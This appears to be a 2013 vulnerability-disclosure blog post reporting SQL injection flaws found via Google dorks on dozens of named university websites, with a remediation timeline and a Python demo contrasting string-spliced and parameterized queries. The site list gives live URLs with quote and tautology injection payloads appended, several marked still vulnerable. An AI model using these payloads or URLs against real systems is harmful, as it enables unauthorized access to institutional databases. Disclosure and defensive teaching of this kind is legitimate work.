Vulnerabilities at Universities--84% Don't Care

Summary

Using Google searches, I found 55 serious vulnerabilities in .EDU domains. I notified them all, and 9 of them fixed the problems. This is consistent with my previous "cold calls" projects, in which approximately 20% of the companies notified of vulnerabilities ever did anything about it.

I don't know for sure why this is, but my working hypothesis is that 80% of vulnerability disclosures go to an email inbox that nobody reads, or that is only read by someone who does not understand security and discards them.

Results

Sites    Problems                     Remediations by 11-14-13          Remediations by 12-4-13
1-10     8 SQLi                       None                              2 fixed
11-20    9 SQLi                       1 response, none fixed            3 fixed
21-30    8 SQLi, 2 hosting malware    No responses, 3 fixed             5 fixed *
31-40    9 SQLi                       No responses, 2 fixed             2 fixed
41-50    10 SQLi                      3 fixed                           4 fixed
51-60    8 SQLi                       2 fixed                           3 fixed
61       1 SQLi                       None                              None
-------  ---------------------------  --------------------------------  --------------------------------
Totals   53 SQLi, 2 hosting malware   10 SQLi fixed (3 days, 19%)       19 fixed (23 days, 36%)

* (changed from an incorrect 2 on 12-4-13)

I retested the vulnerable links at 7:16 am on 12-4-13:
Fixed: 5, 6, 15, 18, 20, 28, 29, 30, 35, 40, 45, 58 (12)
Changed from Fixed to Vuln: 25, 32, 33 (3)

Vulnerability Details

The Google dorks I used were similar to those listed here, with "inurl:edu" added to them:

https://www.facebook.com/DzMafialAnonymousDz/posts/519935964720997

1 c http://www.bme.jhu.edu/people/primary.php?id=915'
2 c http://scriptures.byu.edu/gettalk.php?ID=1698'

4 c http://www.montserrat.edu/news/press-release-item.php?id=107'
5 FIXED c Resp Fixed http://www.wallawalla.edu/index.php?id=13900&catID=30'


6 FIXED c Removed http://kiemlicz.med.virginia.edu/mcsg7/crystal_harvests/index/page:0/target_id:017890'/sort:staff_id/direction:asc
7 c http://cxc.harvard.edu/XATLAS/preview_obs.php?target_id=9'
8 c http://musicweb.ucsd.edu/ugrad/ugrad-pages.php?i=108'

10 c http://www.mbc.edu/career/employment/detail.php?id=493'


11 c http://library.uwb.edu/arttour/detail.php?artistID=4'
12 c Resp Not Fixed 11-12-13; not fixed 11-14-13 http://cwise.ncsu.edu/research/theme.php?id=2'
13 c http://www.nysipm.cornell.edu/news/nysipm_rss_article.php?newsId=138'
14 c http://www.engl.polyu.edu.hk/ENGL_PROG.php?newsid=53'
15 FIXED c Fixed 12-4-13 http://www.creol.ucf.edu/NewsEvents/NewsDetail.aspx?NewsID=426'


16 c http://www.ices.cmu.edu/newsitem.asp?NewsID=781'

18 FIXED c Fixed 12-4-13 http://www.monmouth.edu/newswire/default.aspx?newsID=5886'
19 c http://www3.nd.edu/~ois/news/article.php?newsid=12'%20or%20'a'='a
20 FIXED c Fixed 12-4-13 http://m.morrisville.edu/news/newsinfo.aspx?newsid=16213'&page=0&set=BIZ


21 c http://www.highland.edu/news_events/announcements.asp?newsid=352'
22 c Resp, gift, but not fixed http://www.exploratorium.edu/imaging-station/gallery.php?Section=Introduction'
23 c http://jenny.tfrec.wsu.edu/opm/gallery.php?pn=165'
24 FIXED F Resp, already knew, Fixed http://www.cvn.columbia.edu/review.php?course=IEOR%20E4003&sem=A13'
25 F Vuln on 12-4-13 http://www.arts.cuhk.edu.hk/~lal/index.php?id=9'


26 FIXED F http://som.adzu.edu.ph/newsupdates/index.php?id=1'
27 c http://www.auburn.edu/oit/news/article.php?id=255'
28 FIXED c Fixed 12-4-13 http://dateline.ua.edu/viagra-online-100mg/
29 FIXED h Fixed 12-4-13 http://my.mcm.edu/?Taki=ordering-soft-viagra-online-100mg
30 FIXED h Fixed 12-4-13 http://blogs.chatham.edu/wp-content.bak/plugins/social/OTAwOQ-3D-3D.asp


31 c http://www.umass.edu/ofr/news.php?act=sendNews&id=61'
32 F Vuln on 12-4-13 http://www.bulsu.edu.ph/news.php?id=3'
33 F Vuln on 12-4-13 http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12'
34 c http://events.muohio.edu/event.php?event_id=190427'&sid=11&cid=362&view=cmonth&day=20120125&dayofweek=
35 FIXED c Resp, not fixed on 11-14, fixed on 12-4-13 http://www.setonhill.edu/ncche/event.php?id=11'


36 c http://cepa.maxwell.syr.edu/cdb/event.php?id=44'&flyer=1
37 c http://www.fsl.orst.edu/lemma/main.php?project=imap&id=studyAreas'

39 c http://www.iol.umd.edu/People/person.php?id=tweyrauch'
40 FIXED c Fixed on 12-4-13 http://schultz-appel.missouri.edu/person.php?id=110'&nid=9&PersonName=Heidi++Appel


41 FIXED F Resp Removed http://student.santarosa.edu/~dkrempel/2010fall/cs5513/assn17/detail.php?id=0000025'
42 c http://www1.chaffey.edu/faq/detail.php?faq_id=2'
43 c https://myptc.pulaskitech.edu/acp/StudentEvals/displayCourses.php?StudentID=@@HostID'
44 c http://www2.tesc.edu/course.php?CourseCode=HIS-101'%20or%20'a'='a
45 FIXED c Fixed 12-4-13 http://wwwdata.forestry.oregonstate.edu/forestry/pubs/fmc/slc/courses/course.php?num=FOR441'


46 FIXED F Fixed http://online.darton.edu/degrees/course.php?width=858&height=500&cid=19'
47 c http://www.universitypress.andrews.edu/catalog.php?key=213'
48 c http://storyboard.eden.edu/kiosk/alumni-class.php?slug=1930'
49 FIXED F Removed https://www.egr.msu.edu/chems/class.php?page=29'
50 c http://personal.frostburg.edu/mamorgan0/cosc625/api/class.php?class=Room'


51 FIXED F Fixed http://www.nc-climate.ncsu.edu/climate/groundhog/record.php?year=2013'
52 c http://www.stat.iastate.edu/directory/personal.php?id=mshelley'

55 c Not fixed 11-12-13, still vuln 12-4-13 http://students.ncsu.edu/top54/list.php?id=1'


56 c http://www.rmrs.nau.edu/mistletoe/dyn/results.php?keyw=49'&reftype=keyword
57 FIXED F Resp Fixed http://lib.colostate.edu/wildlife/results.php?q=%22Aardwolf%22&field=fulltopicStr'
58 FIXED c Fixed 12-4-13 http://www.waterbase.glwi.uwm.edu/mmsd/one-survey.php?survey_id=3'
59 c http://flrcvideos.unc.edu/video.php?link=531'
60 c http://www.indstate.edu/news/video.php?videoid=566'


61 c http://www.northlandcollege.edu/services/placement/jobs/job.php?job_id=2327'

Notes:
c: SQLi vuln
F: Fixed
h: Hosting malware
FIXED at the start of an entry: fixed as of the 12-4-13 retest
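Every entry in the list above was found the same way: take a parameter such as id=493, append a single quote (or, in entries 19 and 44, the tautology ' or 'a'='a), and watch for a database error or changed output. The Python example below is added here to show why that probe works and what the fix looks like; it is not code from the original post or from any of the listed sites. The news table, its rows, and the function names are constructed for the demo, and SQLite stands in for whatever database the real pages use.

```python
import sqlite3

# Constructed sample table standing in for a campus "news" lookup such as
# news.php?id=N. Schema, rows and all names are assumptions for this demo,
# not anything taken from the listed sites.
ROWS = [(1, "Convocation"), (2, "Grant awarded"), (3, "Campus closed")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, raw_id):
    """The bug class behind the list: the query-string value is spliced into
    the SQL text. Returns ("ok", rows) or ("error", dbms message)."""
    sql = "SELECT id, title FROM news WHERE id = '" + raw_id + "'"
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.Error as exc:
        # On a live page this exception surfaces as a DBMS error message or a
        # 500; that visible change is what the trailing-quote test watches for.
        return ("error", str(exc))


def lookup_fixed(conn, raw_id):
    """Same lookup with a bound parameter: the quote is data, never syntax."""
    try:
        rows = conn.execute(
            "SELECT id, title FROM news WHERE id = ?", (raw_id,)
        ).fetchall()
        return ("ok", rows)
    except sqlite3.Error as exc:
        return ("error", str(exc))


def quote_probe(conn, handler, value):
    """The test the page's URLs perform: request value, then value + "'",
    and compare. An error on the quoted request alone is the SQLi signal."""
    plain_status, _ = handler(conn, value)
    quoted_status, detail = handler(conn, value + "'")
    if plain_status == "ok" and quoted_status == "error":
        return "likely injectable: " + detail
    return "no error from trailing quote"


def tautology_probe(conn, handler, value):
    """The second payload on the page (entries 19 and 44): value' or 'a'='a.
    Returns True when the tautology yields more rows than the plain id,
    i.e. the WHERE clause was rewritten by the input."""
    plain_status, plain_rows = handler(conn, value)
    taut_status, taut_rows = handler(conn, value + "' or 'a'='a")
    return (plain_status == taut_status == "ok"
            and len(taut_rows) > len(plain_rows))


if __name__ == "__main__":
    db = make_db()
    for name, handler in (("vulnerable", lookup_vulnerable),
                          ("fixed", lookup_fixed)):
        print(name, "-", quote_probe(db, handler, "2"),
              "- tautology bypass:", tautology_probe(db, handler, "2"))
```

The parameterized version returns an empty result for both payloads instead of an error or extra rows, which is exactly why a retest like the one on 12-4-13 can tell a real fix from a site that merely hid its error messages: suppressing the error leaves the tautology probe still returning the whole table.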

Ethics

I originally planned to wait a week before disclosing these URLs, but the timeline of responses shows, as I expected, that the few universities that care fixed them immediately, and the rate of fixing has already fallen to near zero. Further delay seems pointless.

Changelog

Notifications sent between 8:30 and 10:30 am 11-11-13 (Monday)
4:12 pm 11-11-13: 6 friendly responses, one with a gift
7 am 11-12-13: one more friendly response, 2 fixed
5 pm 11-12-13: 3 fixed, 3 removed
11-14-13: one more fixed (#5)
Posted 10:14 am 11-14-13; updated 7:51 am 12-4-13